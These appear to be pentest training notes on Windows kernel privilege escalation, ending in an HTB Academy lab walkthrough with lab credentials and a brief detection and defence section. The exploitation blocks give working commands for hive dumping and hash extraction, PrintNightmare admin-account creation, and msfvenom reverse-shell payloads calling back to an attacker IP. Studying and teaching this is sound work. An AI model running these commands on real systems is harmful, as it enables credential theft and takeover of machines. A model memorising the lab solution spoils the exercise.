# Kernel Exploits ## 🎯 Overview **Kernel exploits** leverage vulnerabilities in the Windows kernel to gain **SYSTEM privileges**. Historical Windows systems have numerous known exploits, while modern systems have fewer but still critical vulnerabilities. **100% patch compliance** is rarely achieved, creating opportunities for **local privilege escalation**. ## 📊 Historical Vulnerability Landscape ### Major Exploit Families by Windows Version ```cmd # Legacy Systems (High Exploit Count): Windows XP/2003 → MS08-067, MS08-068, MS09-012, MS10-015, MS11-046 Windows Vista/2008 → MS08-025, MS09-050, MS10-059, MS10-092 Windows 7/2008R2 → MS11-011, MS13-005, MS13-053, MS14-058, MS15-051 Windows 8/8.1/2012 → MS13-081, MS14-040, MS15-076, MS16-032 # Modern Systems (Fewer but Critical): Windows 10/2016/2019 → MS17-010, CVE-2021-36934, CVE-2021-1675, CVE-2020-0668 ``` ### Evolution Pattern ```cmd # Vulnerability trends: - Legacy systems: 30+ known kernel exploits - Windows 7: 15+ exploits (still common in enterprise) - Windows 10: 5+ critical exploits (ongoing discoveries) - Server 2019: Active research target with new findings ``` ## 🔥 Notable Legacy Vulnerabilities ### MS08-067 (Conficker/Legacy) ```cmd # Remote Code Execution in "Server" service - Affected: Windows XP/Vista/2003/2008 - Impact: Unauthenticated RCE as SYSTEM - Usage: Remote exploit or local port forward (445) - Status: Still found in medical/industrial environments ``` ### MS17-010 (EternalBlue) ```cmd # SMBv1 Protocol Vulnerability - Affected: Windows XP through Server 2016 - Impact: Remote code execution as SYSTEM - Vector: SMB protocol mishandling crafted packets - Usage: Direct remote exploit or local privilege escalation ``` ## 💀 Modern Critical Vulnerabilities ### CVE-2021-36934 (HiveNightmare/SeriousSam) ```cmd # Registry Hive Access Vulnerability - Affected: Windows 10 (specific builds) - Impact: ANY user can read SAM/SYSTEM/SECURITY hives - Requirement: Shadow copies present (default on most systems) # Detection: icacls c:\Windows\System32\config\SAM # Vulnerable if: BUILTIN\Users:(I)(RX) # Exploitation: .\HiveNightmare.exe # Creates: SAM-DATE, SYSTEM-DATE, SECURITY-DATE files # Hash extraction: impacket-secretsdump -sam SAM-DATE -system SYSTEM-DATE -security SECURITY-DATE local ``` ### CVE-2021-1675 (PrintNightmare) ```cmd # Print Spooler RPC Vulnerability - Affected: All Windows versions with Spooler service - Impact: Remote code execution as SYSTEM - Vector: RpcAddPrinterDriver abuse # Detection: ls \\localhost\pipe\spoolss # Check if Spooler running # PowerShell exploitation: Set-ExecutionPolicy Bypass -Scope Process Import-Module .\CVE-2021-1675.ps1 Invoke-Nightmare -NewUser "hacker" -NewPassword "Pwnd1234!" -DriverName "PrintIt" # Verification: net user hacker # Should show local administrator ``` ### CVE-2020-0668 (Service Tracing) ```cmd # Arbitrary File Move Vulnerability - Affected: Windows 10 (multiple builds) - Impact: Privileged file write leading to code execution - Vector: Windows Service Tracing MaxFileSize manipulation # Prerequisites: - Third-party service binary (e.g., Mozilla Maintenance Service) - Unprivileged startable service running as SYSTEM # Exploitation chain: 1. Generate malicious binary: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=IP LPORT=443 -f exe 2. Execute exploit: CVE-2020-0668.exe source.exe "target_service_path" 3. Overwrite with clean malicious binary 4. Start service for SYSTEM shell ``` ## 🔍 Patch Enumeration ### System Update Analysis ```cmd # Multiple methods for patch assessment: systeminfo # Comprehensive system information wmic qfe list brief # Quick Fix Engineering (patches) Get-Hotfix # PowerShell patch enumeration # Example output analysis: wmic qfe list brief Description HotFixID InstallDate InstalledBy Security Update KB5000808 NT AUTHORITY\SYSTEM # Research patches: # Search KB numbers in Microsoft Update Catalog # Cross-reference with exploit databases ``` ### Vulnerability Assessment Workflow ```cmd # 1. Enumerate system version [environment]::OSVersion.Version # 2. List installed patches wmic qfe list brief | find "KB" # 3. Cross-reference with vulnerability matrices # Check exploit databases for missing patches # 4. Prioritize based on: - Local privilege escalation vectors - Available exploit code - System architecture compatibility ``` ## 🎯 HTB Academy Lab Solution ### Lab Environment * **Credentials**: `htb-student:HTB_@cademy_stdnt!` * **Access Method**: RDP * **Objective**: Escalate to NT AUTHORITY\SYSTEM using 3 different kernel exploits * **Flag Location**: Administrator Desktop ### Complete Walkthrough #### Method 1: HiveNightmare (CVE-2021-36934) ```cmd # 1. Check vulnerability icacls c:\Windows\System32\config\SAM # Look for: BUILTIN\Users:(I)(RX) # 2. Execute exploit .\HiveNightmare.exe # 3. Transfer files and extract hashes # Use extracted hashes for authentication ``` #### Method 2: PrintNightmare (CVE-2021-1675) ```cmd # 1. Verify Spooler service ls \\localhost\pipe\spoolss # 2. Execute PowerShell exploit Set-ExecutionPolicy Bypass -Scope Process Import-Module .\CVE-2021-1675.ps1 Invoke-Nightmare -NewUser "admin123" -NewPassword "Password123!" # 3. Login with new admin user or use privileges ``` #### Method 3: CVE-2020-0668 (File Move) ```cmd # 1. Generate malicious service binary msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACK_IP LPORT=4444 -f exe > malicious.exe # 2. Execute privilege escalation .\CVE-2020-0668.exe C:\Users\htb-student\Desktop\malicious.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe" # 3. Start service for SYSTEM access net start MozillaMaintenance # 4. Access Administrator Desktop flag type C:\Users\Administrator\Desktop\flag.txt ``` ## 🛠️ Exploitation Tools & Techniques ### Essential Tools ```cmd # Kernel exploit frameworks: - Windows-Exploit-Suggester # Patch analysis - Sherlock.ps1 # PowerShell exploit suggester - Watson # .NET exploit suggester - Metasploit local exploits # Automated exploitation # Manual analysis: - systeminfo + online databases - Microsoft Update Catalog research - CVE databases and PoC repositories ``` ### Exploitation Strategy ```cmd # 1. System reconnaissance systeminfo | findstr /B "OS Name" "OS Version" "System Type" # 2. Patch analysis wmic qfe list brief # 3. Exploit selection based on: - Windows version/architecture - Available patches - Service requirements - Stealth considerations # 4. Execution methodology: - Test in isolated environment - Understand exploit requirements - Prepare post-exploitation steps - Plan cleanup procedures ``` ## ⚠️ Detection & Defense ### Detection Indicators ```cmd # Monitor for: - Unusual service manipulation - Registry hive access patterns - Printer driver installation attempts - Privilege escalation events (Event ID 4672) - Process creation with SYSTEM context ``` ### Defensive Measures ```cmd # Security hardening: - Maintain current patch levels - Implement defense-in-depth - Monitor for exploit artifacts - Disable unnecessary services (Print Spooler if not needed) - Regular vulnerability assessments - Application whitelisting ``` ## 💡 Key Takeaways 1. **Legacy systems** have extensive exploit surface area 2. **Modern systems** still vulnerable to critical flaws 3. **Patch management** is rarely 100% effective 4. **Local port forwarding** can enable remote exploits 5. **Multiple exploitation paths** often available 6. **Post-exploitation cleanup** essential for stealth *** *Kernel exploits remain a viable privilege escalation vector due to the complexity of maintaining perfect patch compliance in enterprise environments.*